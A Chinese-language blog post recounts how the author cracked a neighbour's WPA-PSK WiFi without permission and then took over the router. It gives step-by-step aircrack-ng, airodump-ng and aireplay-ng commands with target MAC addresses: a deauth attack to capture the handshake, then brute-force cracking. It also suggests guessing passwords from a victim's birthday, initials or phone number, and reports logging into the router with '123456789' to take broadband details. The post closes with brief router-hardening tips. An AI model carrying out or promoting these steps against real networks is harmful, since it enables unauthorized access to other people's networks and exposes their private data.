隔壁黑客上線了-記一次WIFI破解實戰

放假回家寬頻到期,打電話問了一下一年要1000大洋!丫的1000大洋啊,當時我就去他丫的拒絕了,回到家躺了幾天實在無聊,無奈掏出了塵封了好多天的筆記本,想寫寫代碼也比躺著消磨時間好。

打開電腦後順手打開了網路設置

村裡窮能搜到WIFI真是不容易,看到這多少有點興奮,起碼有點希望了,然後祭出神器kali。

下面為破解WIFI的正常步驟,由於本次實戰沒有具體的截圖這裡部分引用了先前發在博客的WPA-PSK無線網路的破解 內的部分圖片,此篇文章也引自那篇筆記。

1.首先開啟網卡的監聽模式

airmon-ng start wlan0

在開啟監聽模式後網卡會被重新命名為wlan0mon (kali2.0之前的版本會重命名為 mon)

2.掃描附近無線情況。

airodump-ng wlan0mon

在這裡看到了僅有的兩個無線網路,而且幸運的是正好有設備在線那就好辦了,我們想辦法讓他掉線,然後在他重新連接時抓取握手包,跑包就可以了。

3.抓取握手包

airodump-ng --bssid 78:A3:51:12:A6:A8 -c 1 -w wifi wlan0mon

參數說明: --bssid 目標AP MAC

-c 目標AP所在信道

-w 握手包保存的文件名

4. 使用DEAUTH攻擊使已經連接的客戶端斷開並重新連接,以產生握手包

aireplay-ng -0 0 -a 78:A3:51:12:A6:A8 -c 84:73:03:A2:82:67 wlan0mon

參數解釋: -0 Deautenticate攻擊模式 0代表無限次

-a 目標ap的mac

-c 攻擊者網卡mac

發起攻擊後我們可以看到客戶端的幀(Frames)迅速增加

當看到 WPA handshake 時 證明已經成功抓取到握手包

5.跑包

aircrack-ng -w /root/Desktop/pwd.txt wif.cap

這裡由於不知道是哪家的WIFI 沒法通過社工創建字典 只能暴力 這裡我使用的是八位純數字字典條數超過1億,不建議通過這種方法盲目跑包,成功率低、耗時大,建議可以在前期通過簡單的信息搜集,根據朋友的經驗密碼格式大部分為生日:19xx0xxx、名字首字母+生日:zs19xx0xxx 或者為手機號,所以前期收集一些信息會大大減少破解周期。

這次在沒有任何信息的情況下我只能通過暴力破解的方法 不過運氣不錯 密碼並不複雜 看了會電視密碼就出來了

根據這個密碼 可以猜測到路由器管理密碼也不會太複雜

果然 123456789成功登錄路由器後台,同時也拿到了寬頻的相關信息。

如果後台的確使用了較為複雜的密碼,可以zhuanlan.zhihu.com/p/20根據這篇文章也可以拿到路由器管理許可權。

WIFI已經成為現代人生活中不可缺少的部分,但是目前的情況來看,無線安全仍然存在較大的問題,近期由於無線所引發的問題也越來越多,對於不信任的WIFI千萬不要隨便連接,如果你一旦進入攻擊者的區域網內,你的所有隱私將不會再是隱私。

無線網路引發內網滲透:zhuanlan.zhihu.com/p/21,這篇文章的入口就是WIFI,導致整個內網暴露在攻擊者的手下。

對於個人路由器的建議:

1.加強無線密碼強度,純8位數字組合超過1億 純9位數字組合超過10億 如果加入大小寫字母 特殊字元 這個組合將成數倍增加,所以一個高強度的密碼是路由器防護的第一道牆。

2.開啟MAC白名單制,路由器的白名單可以直接丟棄非白名單內的連接。

3.定期查看連接列表,對於不信任的MAC加入黑名單。

以上幾點僅能在一定程度上將強安全,但是沒有絕對的安全,在複雜的密碼只要有時間也會跑出來,白名單黑名單可以通過偽造MAC地址繞過,所以網路安全必須時時警惕。

蹭網、冒雨 30分鐘寫的,因為不知道什麼時候鄰居就會拔網線,有錯見諒!


推薦閱讀:

隔壁不光蹭網,還無恥的把我家的無線設備都拉黑了,怎麼教訓回敬一下?
為什麼蘋果提示不廣播SSID會暴露個人信息,並建議用戶到路由器上設置為廣播SSID?

TAG:无线网络安全 |